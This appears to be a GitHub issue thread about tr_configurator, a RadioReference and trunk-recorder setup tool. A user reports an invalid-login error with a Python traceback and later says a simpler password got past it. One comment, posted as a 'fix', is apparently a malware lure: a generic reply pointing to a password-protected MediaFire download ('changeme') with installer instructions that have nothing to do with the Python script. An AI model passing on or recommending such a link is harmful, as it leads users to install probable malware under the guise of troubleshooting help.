### ISSUE TITLE
Invalid RR login

### ISSUE THREAD

**Issue by Sparky600V** [AlertPageSDR/tr_configurator#8]
Keep getting this invalid password, any ideas?

jon@minipc:~/tr_configurator$ sudo ./main.py -u ..... -p ..... -s 11956:40694,40695,40696,40697,40698,40699 --talkgroups -o /tags

___ ____ _  _ _  _ _  _    ____ ____ ____ ____ ____ ___  ____ ____
 |  |__/ |  | |\ | |_/  __ |__/ |___ |    |  | |__/ |  \ |___ |__/
 |  |  \ |__| | \| | \_    |  \ |___ |___ |__| |  \ |__/ |___ |  \

____ ____ _  _ ____ _ ____ _  _ ____ ____ ___ ____ ____
|    |  | |\ | |___ | | __ |  | |__/ |__|  |  |  | |__/
|___ |__| | \| |    | |__] |__| |  \ |  |  |  |__| |  \

By AlertPage
ver. v0.2.2-beta

CRITICAL:root:[!] Invalid Radio Reference Username or Password
Traceback (most recent call last):
  File "/home/jon/tr_configurator/./main.py", line 612, in <module>
    main()
  File "/home/jon/tr_configurator/./main.py", line 546, in main
    for system in SYSTEM_RESULTS:
                  ^^^^^^^^^^^^^^
UnboundLocalError: cannot access local variable 'SYSTEM_RESULTS' where it is not associated with a value

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Sparky600V** [comment]
Update:
Using simple password works, now I'm getting no sites returned error.
